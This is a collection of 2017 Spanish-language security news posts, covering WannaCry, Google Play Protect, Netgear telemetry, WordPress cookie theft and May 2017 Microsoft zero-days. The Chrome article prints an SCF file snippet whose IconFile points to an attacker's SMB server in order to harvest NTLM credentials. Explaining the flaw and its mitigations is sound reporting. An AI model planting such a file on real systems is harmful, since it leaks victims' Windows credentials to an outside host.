Bienvenido a Indetectables.net

Defiéndete del ransomware con la herramienta gratuita de Kaspersky: Kaspersky Anti-Ransomware

Aunque el ransomware es un tipo de malware que lleva tiempo ocupando portadas en los medios centrados en la ciberseguridad, no ha sido hasta la expansión reciente de WannaCry cuando se ha dado a conocer de forma clara ante el público general.

WannaCry ha infectado a más de 200.000 ordenadores en 150 países, gracias a que utilizó un mecanismo de esparcimiento derivado de las herramientas robadas y filtradas de la NSA. De hecho es su mecanismo de esparcimiento lo que hace peligroso a WannaCry, ya que en lo que se refiere al ransomware, no parece algo fuera de lo común y estándar dentro de este tipo de malware. Tras la primera oleada, Europol está avisando sobre una nueva versión tipo gusano que podría terminar siendo incluso más peligrosa que la anterior.

Muchos ransomware no pueden ser descifrados de forma gratuita, provocando que el daño causado sea irreparable al menos se pase por la caja de los ciberdelincuentes, y en caso de de ser una empresa, esto puede derivar en fuertes pérdidas, tanto a nivel de económico como de clientes.

Con el fin de evitar que el ransomware se convierta en un episodio trágico para una empresa, Kaspersky Anti-Ransomware es una herramienta gratuita creada para proteger, sobre todo a pequeñas y medianas empresas, del ransomware y el cryptomalware. Funciona con cualquier otra solución de seguridad sin necesidad de instalar los productos de Kaspersky Lab.

Kaspersky Anti-Ransomware es una herramienta que ayuda a prevenir la infección de un tipo de malware que si bien no es el más extendido, sí se ha mostrado posiblemente como el más peligroso. Por otro lado, esto no evita el tener que tomar medidas de precaución adicionales debido a la peligrosidad mencionada.

En la informática toda medida de seguridad tomada puede terminar siendo poca, así que cuantas más medidas se tomen, mejor.

por Eduardo Medina Wed, 24 May 2017 10:10:58 +0000

Netgear ha introducido recolección de datos en uno de sus modelos de routers

Netgear está distribuyendo desde hace un tiempo un nuevo firmware para el router NightHawk R7000. Esto en sí mismo no es una noticia destacable, salvo por el hecho de que dicho firmaware incluye una nueva característica que permite al fabricante recolectar datos para analíticas que van a sus servidores.

De momento el firmware solo ha llegado al NightHawk R7000, aunque no se descarta que pueda llegar a otros modelos de routers. Por otro lado, la polémica característica introducida por Netgear recolecta los siguientes datos:

  • El número total de dispositivos conectados al router.
  • Dirección IP.
  • Dirección MAC.
  • Número de serie.
  • Estado de ejecución del router.
  • Tipos de conexión.
  • Estado de la LAN y la WAN.
  • Bandas Wi-Fi y canales.
  • Detalles técnicos sobre el uso y funcionamiento del router y de la red Wi-Fi.

La compañía ha argumentado que está recolectando esos datos para rutinas de diagnósticos con el fin de saber cómo son usados y cómo se comportan sus routers en entornos reales. La intención es poder “aislar y depurar más rápido los problemas técnicos generales, mejorar la funcionalidad y las características del router y mejorar el rendimiento y la usabilidad.”

Evidentemente, no han tardado en surgir voces criticando este movimiento de Netgear, y es que para muchos los datos recopilados pueden ser abusivos. En caso de ser un usuario del NightHawk R7000 y haber actualizado recientemente el firmware, la recolección de datos puede ser inhabilitada siguiendo los siguientes pasos:

  • Abrir un navegador web compatible con los estándares web modernos (da igual que sea un PC, un smartphone o una tablet).
  • Entrar al acceso del router a través de la URL http://www.routerlogin.net.
  • Introducir el nombre de usuario y la contraseña de acceso al router. En caso de no haber cambiado la configuración por defecto (algo que no se tiene que hacer) el nombre de usuario sería admin y la contraseña password.
  • Seleccionar Advanced (Avanzado) → Administration (Administración) → Router Update (Actualización del router) desde la página de inicio (Home).
  • Descender con el scroll hasta encontrar la sección Router Analytics Data Collection (Recolección de Datos para Analíticas del Router) y seleccionar la opción Disable (Inhabilitar o Desactivar).
  • Hacer clic sobre el botón Apply (Aplicar) para guardar los cambios.

Alternativa: Instalar DD-WRT

DD-WRT es un firmware Open Source basado en Linux diseñado para mejorar la seguridad de los routers con soporte para redes Wi-Fi.

Muchas personas obsesionadas con la privacidad instalan DD-WRT sustituyendo el firmware del fabricante, aunque antes de hacer nada sería mejor comprobar la lista de dispositivos compatibles y ver si el router actualmente en uso está soportado. En caso afirmativo, se puede proceder a la descarga e instalación del firmware.

Para instalar DD-WRT hay que seguir los siguientes pasos:

  • Acceder a la administración del router. Generalmente la IP local es 192.168.0.1 o 192.168.1.1.
  • Ir a la sección de administración del router y seleccionar “Actualización del firmware” (el nombre puede cambiar según el modelo).
  • Seleccionar el fichero del firmware de DD-WRT y subirlo.
  • Esperar a que el proceso de actualización termine (se recomienda encarecidamente el uso de un SAI para evitar sustos y desgracias relacionados con apagones y bajones de tensión en el fluido eléctrico).
  • Se recomienda asegurarse al máximo sobre la compatibilidad, ya que en caso de no serlo, el router podría acabar roto e inservible.

Fuente: The Hacker News

por Eduardo Medina Tue, 23 May 2017 10:45:58 +0000

Google Play Protect pretende mejorar la seguridad de los dispositivos Android

Google ha presentado recientemente otra herramienta defensiva a nivel de seguridad para Android: Google Play Protect.

Google Play Protect es una herramienta para Android que ha sido introducida en la aplicación Play Store. Lo que hace es utilizar el aprendizaje automático y realizar análisis de uso de las aplicaciones para eliminar o bloquear las que resulten peligrosas y/o maliciosas. No requiere que los usuarios activen su protección por separado y estas son las partes de las que se compone:

  • Escaneo de aplicaciones.
  • Medidas anti robo.
  • Protección de la navegación.

Escaneo de aplicaciones

Google Play Protect es un servicio activo en la aplicación de la Play Store que, según el gigante de Mountain View, podría escanear 50.000 millones de aplicaciones cada día a través de los más de mil millones de dispositivos Android activos en el mundo (escanea las aplicaciones instaladas).

Google ya ha tomado medidas para evitar el esparcimiento del malware a través de su ecosistema, incluyendo la aplicación Verify Apps y el servicio Bouncer. Sin embargo, estos no han resultado ser suficientes, lo que ha provocado la detección tardía de algunos malware como Bankbot. Google Play Protect no solo protege de las aplicaciones procedentes de la Play Store, sino también de las que vienen de tiendas de terceros, lo que aumenta de forma notable su utilidad.

Google ha empleado algoritmos de aprendizaje automático para comprar los comportamientos de las aplicaciones y distinguir aquellos que sean anormales. En caso de encontrar un comportamiento malicioso, avisa al usuario e incluso podría inhabilitar la aplicación para evitar un daño mayor.

Por otro lado, la compañía está actualizando constantemente sus algoritmos de aprendizaje automático para mejorarlos y encontrar nuevos riesgos y aplicaciones maliciosas, así como la decisión de mantenerlas o no instaladas en los dispositivos una vez detectadas.

Medidas anti robo

Las medidas anti robo son para el robo físico. Aquí, Android Device Manager ha sido reemplazado por Encontrar Mi Dispositivo (Find My Device) para localizar uno que se haya perdido o extraviado.

El usuario puede usar el navegador o cualquier otro dispositivo para realizar llamadas remotas, localizar y bloquear un dispositivo Android, e incluso podría borrar los datos de forma remota con el fin de protegerlos.

Encontrar Mi Dispositivo es básicamente el mismo mecanismo que Android Device Manager, aunque incluido en el programa de Google Play Protect para hacerlo más accesible.

Navegación segura

La Navegación segura es una característica que abarca la navegación con Chrome. Obviamente, se trata de mantener seguro al usuario mientras navega, algo en lo que Google lleva trabajando desde hace años con su navegador.

La navegación web suele ser una de las vías más comunes para difundir malware. Esta característica incluida en Google Play Protect se encarga de avisar y bloquear páginas web sospechosas o que son inseguras.

Google Play Protect tendría que empezar a ser desplegado en las próximas semanas.

Fuente: The Hacker News

por Eduardo Medina Mon, 22 May 2017 11:12:40 +0000

Hay opciones de descifrar WannaCry gratis desde un Windows XP infectado

Los usuarios de Windows XP tienen una posibilidad de descifrar WannaCry de forma gratuita, aunque para ello han tenido que evitar el apagado o reinicio del ordenador después de haber sido infectados por el temido ransomware.

Esto ha sido descubierto por Adrien Guinet, investigador en la empresa de ciberseguridad francesa Quarkslab, quien ha liberado un software que le ha permitido recuperar la clave secreta de descifrado para restaurar una computadora con Windows XP en su laboratorio. Este software todavía no ha sido probado a fondo, así que no se sabe si puede ser aplicado sobre la gran variedad de computadoras que funcionan con el vetusto sistema operativo de Microsoft, e incluso en caso de funcionar, podría haber limitaciones.

La repercusión de esta técnica de recuperación puede verse limitada debido a que Windows XP no parece haberse visto tan afectado por el gran brote de WannaCry surgido la semana pasada. A pesar de que el ransomware es compatible con dicho sistema, su mecanismo de dispersión parece que no. Por otro lado, Matt Suiche, un investigador de Comae Technologies, ha reportado a través de Twitter que no fue capaz de ejecutar la herramienta de Guinet con éxito.

WannaCry utiliza la API Criptográfica de Microsoft incluida en el propio Windows para manejar muchas de sus funciones, incluyendo la generación de la clave de cifrado y descifrado de los ficheros. Después de crear la clave de seguridad, la API se encarga de borrarla en la mayoría de versiones de Windows.

Aparentemente se ha descubierto una limitación en Windows XP que evita el borrado de la clave. Como resultado, los números primos utilizados para generar la clave secreta de WannaCry permanecen intactos en la memoria del ordenador mientras el sistema siga encendido tras la infección. La herramienta de Guinet, cuyo nombre es Wannakey, fue capaz de examinar con éxito la memoria de una máquina XP infectada y extraer los valores las variabes p y q en las que se basa la clave secreta. A partir de ahí, según ha publicado en Twitter, el investigador fue capaz de extraer la clave.

Sobre WannaCry no hay nada realmente destacable, ya que se trata de un ransomware estándar. Lo que ha convertido a este malware en algo realmente peligroso ha sido su mecanismo de esparcimiento, el cual está basado en una herramienta de hacking de la NSA llamada EternalBlue y que fue filtrada por Shadow Brokers.

El descubrimiento de Adrien Guinet ha podido abrir la puerta al descifrado gratuito y total de WannaCry, aunque todavía es pronto para cantar victoria. Por otro lado, esto no es excusa para bajar la guardia bajo ningún concepto.

Fuente: ArsTechnica

por Eduardo Medina Fri, 19 May 2017 14:13:22 +0000

Una vulnerabilidad abierta por Chrome permite robar credenciales de Windows

Un investigador en seguridad ha descubierto una importante vulnerabilidad en la configuración por defecto de la última versión de Google Chrome cuando es ejecutada sobre cualquier versión sistema operativo Windows, incluido la 10.

Bosko Stankovic, de DefenseCode, ha encontrado un fichero SCF (Shell Command File) malicioso mientras visitaba un sitio web. Dicho fichero hace que las víctimas entreguen inconscientemente a los hackers las credenciales de acceso al sistema operativo, utilizando para ello el navegador web Google Chrome y el protocolo SMB (el mismo que estuvo implicado en el esparcimiento de WannaCry).

La técnica en sí misma no es nueva, ya que fue empleada por Stuxnet, un malware que en un principio fue diseñado para neutralizar estructuras de Irán. Para realizar sus acciones maliciosas, Stuxnet usaba ficheros de acceso directo LNK de Windows para comprometer los sistemas objetivo. Sin embargo, lo que hace diferente al ataque mediante Google Chrome es el hecho de utilizar autenticación a través de SMB.

El formato de ficheros de atajo SCF funciona de forma similar al LNK y está diseñado para soportar conjuntos limitados de órdenes del Explorador de Windows para definir iconos presentes en el escritorio, como los correspondientes a Equipo (antes Mi PC) y la Papelera de reciclaje. Básicamente, se tratan de ficheros de texto localizados en el escritorio con una sintaxis específica de Shell que define la localización de un icono y el ejecutable de la aplicación.

[Shell]
Command=2
IconFile=explorer.exe,3

Desde que el navegador de Google confía en los ficheros SCF, los atacantes pueden engañar a una víctima para que visite sitios web que contengan accesos directos SCF específicamente diseñados. Dichos ficheros son descargados en el espacio del usuario de forma automática y sin pedir ninguna confirmación debido a que Google Chrome inicia las descargas de forma automática.

Después de haber sido descargados, los ficheros se ejecutan para recuperar un icono sin que el usuario tenga que hacer clic sobre estos. Sin embargo, en lugar de una ruta donde se localiza un icono, lo que contiene en realidad es la dirección de un servidor SMB remoto controlado por el atacante, cuyo código podría ser el siguiente:

[Shell]
IconFile=\\170.170.170.170\icon

Tan pronto como el fichero SCF inicie el falso proceso de recuperación de icono, engañará al sistema para que realice una autenticación automática sobre el servidor remoto controlado por el atacante a través del protocolo SMB. Esto entregará el nombre de usuario y la contraseña “hasheada” (cifrada) de la víctima, permitiendo al atacante utilizar dichas credenciales para autenticarse en el sistema o a un recurso de red.

Desde que se destapó el caso de Stuxnet, Microsoft parcheó para que los accesos directos LNK no pudiesen apuntar más allá del propio ordenador local, sin embargo, parece que se le olvidó aplicar esto sobre los ficheros SCF.

¿Cómo procesa Windows las credenciales de forma automática a un servidor?

Ejemplo de autenticación NTLM

Así es cómo funciona la autenticación a través de un servidor SMB en combinación con la petición y respuesta del mecanismo de autenticación NTLM. Empezaremos por los cuatro pasos realizados por la autenticación LM/NTLM:

  1. Los usuarios de Windows (clientes) intentan acceder a un servidor.
  2. El servidor responde con un valor de petición, pidiendo al usuario que cifre el valor de petición con su contraseña cifrada y lo mande de vuelta.
  3. Windows maneja las peticiones SCF a través del envío al servidor del nombre de usuario del cliente y la contraseña cifrada.
  4. Entonces el servidor captura la respuesta y aprueba la autenticación en caso de que la contraseña cifrada sea la correcta.

Ahora, según el escenario de ataque SCF elaborado por Stankovic, Windows intentará autenticarse en el servidor SMB malicioso automáticamente suministrándole el nombre de usuario de la víctima y su contraseña cifrada a través de NTLMv2, tal y como está descrito en el tercer paso.

En caso de que la víctima forme parte de una red corporativa, las credenciales de red asignadas a su usuario por el administrador de sistema de la empresa serán enviadas al atacante. En caso de que la víctima sea un usuario doméstico, su nombre de usuario y su contraseña de Windows serán enviados al atacante.

El hecho de enviar la contraseña cifrada la vuelve difícil de utilizar para iniciar sesión, pero al tener el atacante el nombre de usuario, se abre la puerta a la utilización de la fuerza bruta para hallar la contraseña. Por otro lado, también es importante recalcar que algunos servicios de Microsoft podrían aceptar la contraseña cifrada como forma de acceso, entre los cuales se puede mencionar a OneDrive, Outlook.com, Office 365, Office Online, Skype y Xbox Live.

Esta vulnerabilidad abre la puerta a otras como la posibilidad de ir escalando privilegios una vez se haya conseguido acceder a un sistema, algo que puede terminar teniendo consecuencias desastrosas en caso de tratarse de una red corporativa.

Cómo evitar este ataque relacionado con la autenticación a través de SMB

En primer lugar, se recomienda tener los puertos 139 y 445 cerrados para el tráfico saliente en el router, ya que son los utilizados por los servidores SMB.

Stankovic también recomienda inhabilitar las descargas automáticas en Google Chrome. Para ello hay que dirigirse a Configuración > Mostrar configuración avanzada > seleccionar “Preguntar dónde se guardará cada archivo antes de descargarlo”. El hecho de tener que aprobar manualmente las descargas dará la oportunidad al usuario de rechazar los ficheros sospechosos o que no ha solicitado.

Por su parte, Google ya ha anunciado que está trabajando en la elaboración de un parche contra esta vulnerabilidad.

Inhabilitar las descargas automáticas en Google Chrome

Fuente: The Hacker News

por Eduardo Medina Thu, 18 May 2017 14:05:43 +0000

Un malware usa un falso dominio de WordPress para robar cuentas de administrador

Investigadores en seguridad de Sucuri han encontrado sitios WordPress legítimos que han sido alterados para hacerse con las cookies de los administradores y luego acceder como estos, utilizando para ello un dominio falso que presuntamente pertenece a la API de WordPress.

El atacante desvía las cookies robadas a code.wordpressapi.com, un dominio perteneciente a un servicio no existente de WordPress. Cesar Anjos, de Sucuri, encontró este malware escondido en la parte inferior de unos ficheros de JavaScript legítimos mientras respondía a un incidente.

El propósito del malware es robar cookies y enviarlas a un dominio falso cada vez que un usuario accedía a su sitio web legítimo, cuyo código JavaScript contiene escondido la parte maliciosa empleada por los hackers. Procediendo de esta manera, parece que el objetivo principal es hacerse con cuentas de administrador para luego acceder con elevados privilegios a sitios WordPress legítimos.

Las cookies generadas por los administradores de sitios WordPress contienen datos que pueden ser usados para mimetizar sus accesos sin necesidad de introducir las contraseñas. Este tipo de ataque, que se llama secuestro de sesión, permitiría a un atacante acceder al backend o back office del CMS, pudiendo hasta crear nuevas cuentas de administrador cuyos propietarios serían los atacantes.

Los expertos de Sucuri no han explicado cómo se ha podido cargar código malicioso en los ficheros JavaScript de sitios WordPress legítimos, pero la gran cantidad de instalaciones, temas y plugins obsoletos que están en funcionamiento muestran el ecosistema montado con este CMS como inseguro. Los temas y plugins obsoletos contienen vulnerabilidades que los hackers podrían aprovechar para controlar un sitio web o bien llevar a cabo ataques complejos.

WordPress lanza un programa de recompensas en HackerOne

Curiosamente, el equipo tras el CMS más utilizado de Internet decidió ayer poner en marcha un programa de recompensas por encontrar vulnerabilidades en la plataforma HackerOne.

El programa cubre proyectos oficiales como WordPress, BuddyPress, bbPress, GlotPress y WP-CLI, así como todos los sitios web oficiales: WordPress.org, bbPress.org, WordCamp.org, BuddyPress.org y GlotPress.org.

En un programa de recompensas anterior, que fue llevado a cabo de forma privada por el equipo de WordPress, se concedieron premios de 3.700 dólares para aquellos que consiguieran reportar una vulnerabilidad funcional.

WordPress 4.5.7 ya está disponible

El día de ayer también fue liberado la versión 4.5.7 del CMS y de la cual se puede destacar los siguientes fallos corregidos:

  • Validación insuficiente en la redirección en la clase HTTP.
  • Manejo inapropiado de los valores post de metadatos en la API XML-RPC.
  • Falta de capacidades de comprobación para los metadatos de post en la API XML-RPC.
  • Una vulnerabilidad de Falsificación de Petición de Coss Site (CRSF) descubierta en el diálogo de credenciales del sistema de ficheros.
  • Una vulnerabilidad de cross-site scripting (XSS) descubierta cuando se intentaba subir ficheros pesados.
  • Una vulnerabilidad de cross-site scripting (XSS) descubierta relacionada con Customizer.

Fuente: BleepingComputer

por Eduardo Medina Wed, 17 May 2017 10:39:10 +0000

Descubren que WannaCry podría tener vínculos con Corea del Norte

El investigador en seguridad Neel Mehta, que trabaja en Google, ha encontrado evidencias en el ransomware WannaCry que podrían vincularlo con un grupo de hackers apoyado por el estado de Korea del Norte, el cual es conocido por sus ciberataques contra organizaciones de Corea del Sur.

Para poder afirmar esto, Mehta ha descubierto en el código de WannaCry trozos que son idénticos a otros usados a principios de 2015 por Cantopee, un backdoor malicioso desarrollado por Lazarus Group, un grupo de hackers que se cree que está patrocinado por el gobierno de Corea del Norte.

Tras el descubrimiento de Mehta, expertos de Kaspersky Lab, Intezer, Symantec y Comaeio empezaron también a analizar en profundidad el código de WannaCry, encontrando estrechos vínculos con otras familias de malware como Lazarus, Jonap y Brambul, lo que sugiere que el ransomware que causó estragos el pasado fin de semana podría haber sido escrito y modificado por el mismo autor.

Evidencias que podrían vincular WannaCry con Lazarus Group, un grupo de hackers que podría estar vinculado a Corea del Norte

Para los que no recuerden quién es Lazarus Group, recordamos que se le acusa de robar millones de dólares a través de ataques contra el sistema de gestión bancaria SWIFT y según agencias estadounidenses está detrás del ataque hacker contra Sony Pictures ocurrido en 2014.

Sin embargo, de momento no se puede confirmar que el régimen de Kim Jong-Un esté detrás de WannaCry, ya que los hackers detrás de este ransomware han podido igualmente copiar código procedente de malware de Lazarus Group y otros. Tampoco se puede descartar que la inclusión de dicho código haya sido con el propósito de despistar a autoridades, agencias de inteligencia e investigadores.

Symantec ha anunciado que seguirá investigando para despejar todas las incógnitas, mientras que Matt Suiche, de Comaeio, ha comentado que WannaCry podría “ser el primer ransomware impulsado por un estado.”

Noticias relacionadas:

Fuente: The Hacker News

por Eduardo Medina Tue, 16 May 2017 10:13:20 +0000

WannaCry: cuando los problemas complicados tienen soluciones simples

Las personas que han lidiado con la informática a partir de cierto nivel habrán visto que a veces los problemas aparentemente más complicados tienen al final soluciones sencillas. Eso es lo que ha pasado con WannaCry, el ransomware que terminó por revelarse como una amenaza mundial (más por deméritos ajenos que por méritos propios) y que al final tuvo una solución, aunque temporal, muy simple.

En la noticia original intentamos hacer un seguimiento de la expansión del temido ransomware que parecía al principio un problema que afectaba a entidades concretas, pero luego se mostró como una amenaza global gracias a la gran cantidad de sistemas operativos Windows sin soporte y mal mantenidos que hay. Durante su esparcimiento a nivel global llegó a infectar a más de 200.000 ordenadores en más de 100 países. El hecho de haber afectado a muchas entidades importantes ha podido generar millones de euros en pérdidas en algunos casos.

La solución, como ya comentamos entonces, vino de un experto en seguridad que prácticamente consiguió detenerlo de casualidad. De momento parece que no se conoce su identidad, así que lo dejaremos en Malware Tech, su pseudónimo en Twitter. Este investigador trabajó junto con un empleado de ProofPoint, Ryan Kalember, quien le ayudó a detener WannaCry.

Supervisando el código del mecanismo de esparcimiento de WannaCry, que se encontraba entre el material que Shadow Brokers robó de la NSA y luego publicó, los investigadores descubrieron un dominio tan largo como extraño: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. Tras investigar, vieron que no estaba registrado, así que Malware Tech decidió registrarlo a través de NameCheap.com por 10,69 dólares e hizo que apuntara hacia un servidor que tenía bajo su control en Los Ángeles, ya que trabaja para la compañía Kryptos Logic, que tiene su sede en esa ciudad.

El resultado de haber hecho eso fue totalmente inesperado: accionar el mecanismo de desactivación del propio WannaCry. Sin embargo, debido a la sencillez de los pasos a seguir para su desactivación, el propio Malware Tech ha reconocido que su solución es temporal y una simple modificación en el malware haría que su mecanismo de esparcimiento funcionase de nuevo. Por otro lado, los ordenadores infectados permanecerán así mientras no las víctimas no paguen o se halle una forma de descifrar el ransomware de forma gratuita.

Microsoft carga abiertamente contra las agencias de espionaje

Brad Smith, consejero jefe de Microsoft, escribió el pasado sábado en una entrada publicada en el blog de la compañía que WannaCry tendría que servir de “llamada de atención” para los gobiernos de todo el mundo.

El ejecutivo de Microsoft no ha dudado en cargar contra las agencias de inteligencia y seguridad por almacenar vulnerabilidades que, una vez hechas públicas mediante filtraciones, terminan por ser una amenaza contra la seguridad de sus clientes. Yendo aún más lejos, ha equiparado el robo de vulnerabilidades almacenadas por las agencias con el robo de misiles Tomahawk de Estados Unidos.

También ha hecho hincapié en la necesidad de revisar la Convención Digital de Ginebra para obligar a los gobiernos a reportar a los vendedores las vulnerabilidades que van encontrando y así impedir que situaciones como esta se vuelvan a producir.

Por último, si quieres saber cómo protegerte del ransomware, no dudes en echarle un ojo al especial recientemente publicado por nuestros compañeros de MuyComputer.

Fuentes: CNet y The Guardian

por Eduardo Medina Mon, 15 May 2017 10:01:10 +0000

¿Qué está ocurriendo con el ransomware que está afectando a Telefónica y la NHS?

Telefónica dio la voz de alarma cuando se detectó que a través de su red interna empezó a distribuirse un ransomware. La noticia saltó rápidamente a las redes sociales y empresas como Iberdrola, Sanitas, Ferrovial, Gas Natural y Unión Fenosa han tomado medidas para evitar ser infectadas. De momento parece que no está afectando a particulares.

Según parece, un ransomware llamado WanaCryptor, también llamado WannaCry y WCry, se está aprovechando de una vulnerabilidad hallada en el sistema operativo Windows que fue parcheada el 14 de marzo de 2017, con la publicación del Boletín de Seguridad correspondiente a ese mes. Concretamente se trata de la vulnerabilidad 4013389, que afectaba al protocolo SMBv1 y en el peor de los casos permitía la ejecución de código remoto si un atacante enviaba mensajes específicamente diseñados a un servidor Microsoft Server Message Block 1.0 (SMBv1).

La situación llegó a tal extremo que el Centro Criptológico Nacional, dependiente del CNI (servicio de inteligencia de España), ha lanzado un aviso acompañado de mucha información técnica, indicando que el nivel de alerta es muy alto.

De momento se sabe que solo un porcentaje muy pequeño de los decenas de miles ordenadores de Telefónica se han visto afectados por WCry. Sobre el comportamiento de este ransomware, parece que es el normal dentro de este tipo de malware, cifrando los ficheros del disco duro y las unidades de red que va encontrando para luego pedir un rescate de 300 dólares. De hecho, solo se puede destacar su propagación, no solo dentro de España, sino también a nivel internacional. De momento se sabe que afecta a diferentes versiones de Windows, siendo estas las descritas por el Centro Criptológico Nacional:

  • Microsoft Windows Vista SP2
  • Windows Server 2008 SP2 y R2 SP1
  • Windows 7
  • Windows 8.1
  • Windows RT 8.1
  • Windows Server 2012 y R2
  • Windows 10
  • Windows Server 2016

Como medida de precaución, Telefónica y otras organizaciones están desconectando sus redes para evitar la propagación de WCry.

La NHS también se está viendo afectada por WCry

Telefónica no es la única organización de envergadura que se ha visto afectada por WCry, sino que el servicio público de salud británico también ha sido afectado por el ransomware. Esto demuestra que el malware no fue creado para atacar a un país o una organización en concreto, sino que se está esparciendo sin control por Internet, buscando objetivos en todo el mundo.

Ordenadores ubicados en hospitales de toda Inglaterra han empezado a mostrar un mensaje pidiendo un rescate a cambio de recuperar los archivos en su estado original. Obviamente, se trata del mensaje perteneciente al ransomware que nos ocupa en esta entrada. El hecho de manejar datos relacionados con la salud puede hacer que un malware tenga consecuencias catastróficas, y WCry ya ha provocado el desvío de pacientes de los servicios de urgencia a otros hospitales.

La BBC ha estado informando sobre los hospitales afectados por WCry en todo el país. En algunos centros se han visto forzados a tener que parar toda la actividad por culpa de los daños causados o que podía causar el ransomware.

¿Parche incompleto?

Como ya comentamos al principio, se supone que la vulnerabilidad explotada por WCry estaba parcheada, por lo que solo hay dos posibilidades:

  1. Que los mantenedores de los sistemas de las organizaciones afectadas no habían aplicado el parche cuando tocaba.
  2. Que el parche estaba incompleto.

De momento las informaciones que circulan se decantan por la segunda opción, pero tampoco se puede obviar que desde muchas organizaciones, incluso sanitarias, se reconoce el extendido uso de sistemas sin soporte.

Se confirma que se trata de un ataque a nivel mundial

Según recoge en BBC, la empresa de ciberseguridad rusa Kaspersky ha detectado que WCry ha afectado a un total de 74 países y el número sigue aumentando, por lo que se confirma que la campaña es a nivel de mundial y está fuera de control en estos momentos.

Las consecuencias y los daños que puede causar parece que ahora son impredecibles. Los que quieran seguir la actividad del ransomware en tiempo real pueden visitar la siguiente página web de Intel.

[Actualización: 13-05-207 a las 13:25 aprox.]

Un experto consigue, al menos aparentemente, detener el ataque

Un investigador en seguridad que actúa bajo el pseudónimo de Malware Tech en Twitter ha hallado una forma bloquear el ataque de WannaCry. Para ello, decidió registrar un dominio por tan solo 10 libras que encontró en el código del propio ransomware.

Malware Tech halló que, en su proceso de esparcimiento sin control, WannaCry realizaba una comprobación de preinfección apuntando a este dominio: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. El investigador vio que este no estaba registrado, así que decidió hacerse con él.

Tras registrar el dominio de nombre muy largo, Malware Tech consiguió detener de forma accidental el proceso de esparcimiento sin control de WannaCry, debido a que el proceso de cifrado del ransomware se apoyaba en ese dominio no registrado. Esto ha activado un mecanismo de apagado incluido en el propio malware que ha detenido el ataque.

Sin embargo, es importante tener en cuenta que esta solución no es definitiva y que muy posiblemente veamos a WCry actuando a través de otros dominios en el futuro.

WannaCry/WCry/WanaCryptor se ha apoyado en las herramientas robadas a la NSA

El ransomware que ha terminado por ser una amenaza para la ciberseguridad a nivel mundial se ha apoyado en las herramientas que Shadow Brokers robó a la NSA para su mecanismo de esparcimiento, el cual  fue aparentemente publicado a mediados de abril.

Aunque lo relacionado con la red bancaria SWIFT quedó desacreditada, al parecer había material auténtico que ha podido ser aprovechado por algunos ciberdelincuentes para combinarlo con el ransomware WCry.

Microsoft publica actualizaciones para versiones no soportadas de Windows

Ante el gran revuelo generado por WCry, Microsoft ha tomado la decisión de lanzar el parche MS17-010 para Windows XP, Windows 8.0 y Windows Server 2003 como medida excepcional, estando ya disponible para su descarga.

El hecho de no ver un nuevo parche para las versiones de Windows que ya lo recibieron indica que el origen del problema está en equipos mal mantenidos y no en que el parche original fuese insuficiente. Esto convierte en WCry en todo un tirón de orejas para los administradores de sistema y mantenedores de software que no han sido diligentes a la hora de aplicar las actualizaciones de seguridad publicadas por Microsoft.

Por otro lado, el gigante de Redmond ha aconsejado inhabilitar SMBv1 debido a que está obsoleto y fue sustituido hace mucho por versiones más recientes como SMBv2 y SMBv3.

A nivel de números, WCry ha infectado a un total de 78.000 equipos a nivel mundial.

Fuentes: MuyCanal y The Guardian

por Eduardo Medina Fri, 12 May 2017 17:29:54 +0000

Microsoft parchea 4 vulnerabilidades zero-day en sus actualizaciones de mayo 2017

Como parte de la publicación mensual de parches de seguridad, Microsoft ha corregido un total de 55 vulnerabilidades que afectaban a muchos de sus productos, incluidos .NET Framework, Microsoft Office, Internet Explorer, Microsoft Edge y distintas versiones del sistema operativo Windows, y entre las cuales había 4 zero-day.

Tras la publicación mensual de los parches de seguridad, otra vulnerabilidad fue corregida vía urgente. Con el código CVE-2017-0290, corresponde a una de ejecución de código en remoto que afectaba al Motor de Antivirus de Microsoft, el cual viene habilitado por defecto en Windows 7, 8.1, RT, 10 y Server 2016. Fue reportada por los investigadores de Project Zero de Google y podía permitir a un atacante hacerse con el control de un PC con tan solo enviar un email malicioso.

De las 55 vulnerabilidades corregidas por la compañía, 17 fueron etiquetadas como críticas. Los administradores de sistema tendrían que priorizar la aplicación del parche mensual publicado el pasado martes con el fin de corregir cuanto antes las cuatro vulnerabilidades zero-day detectadas, de cuales tres fueron explotadas por grupos de ciberespionaje rusos.

Las 4 vulnerabilidades zero-day

  • CVE-2017-0261: Afecta a las versiones tanto de 32 como de 64 bits de Microsoft Office 2010, 2013 y 2016 y reside en la manera en que la suite ofimática maneja ficheros de imágenes PostScript Encapsulados (EPS/Encapsulated PostScript), permitiendo la ejecución de código en remoto. Podía ser explotada si la víctima era engañada para abrir un fichero con una imagen específicamente diseñada a través de email. Además, también abría la puerta a la explotación de una vulnerabilidad de escalada de privilegios (CVE-2017-0001) que fue parcheada el 14 de marzo por Microsoft, a través de la cual se podía obtener control total sobre el sistema. Según FireEye, un grupo de ciberespionaje ruso que ha actuado bajo los nombres de Turla, Snake y Uroburos ha estado explotándola activamente.
  • CVE-2017-0262: Otra ejecución de código en remoto provocada a partir de una imagen específicamente diseñada incrustada en un documento de Office. FireEye y ESET señalan que el grupo de hackers que ha actuado bajo los nombres de APT28, Fancy Bear y Pawn Storm ha podido estar explotándola de forma activa.
  • CVE-2017-0263: La tercera vulnerabilidad se trata de una escalada de privilegios que afecta a todas las versiones soportadas del sistema operativo Windows, y puede ser aprovechada a través de la manera en que los drivers en modo kernel de Windows manejan objetos en memoria, permitiendo a los atacantes ejecutar código arbitrario en el modo kernel para luego instalar malware, observar, cambiar o borrar datos en el sistema, además de poder crear nuevas cuentas con privilegios totales. Investigadores dicen que esta vulnerabilidad y la anterior han sido explotadas por grupos de ciberespionaje ruso.
  • CVE-2017-0222: Afecta a los navegadores Internet Explorer 10 y 11 y reside en la menara en que el navegador maneja objetos en memoria. A través de la apertura de una página web maliciosa se puede provocar una corrupción de memoria para disparar la ejecución de un ataque de código en remoto, permitiendo a los atacantes tomar el control del sistema afectado. Según Microsoft, esta vulnerabilidad ha sido explotada de forma activa desde muchos frentes.

Otras vulnerabilidades críticas parcheadas

Este mes también han llegado parches para corregir vulnerabilidades críticas halladas en Internet Explorer y Microsoft Edge, las cuales podían llevar a una ejecución de código en remoto a través del engaño de las víctimas para que abriesen una página web maliciosa o vieran publicidad específicamente diseñada a través de dichas aplicaciones.

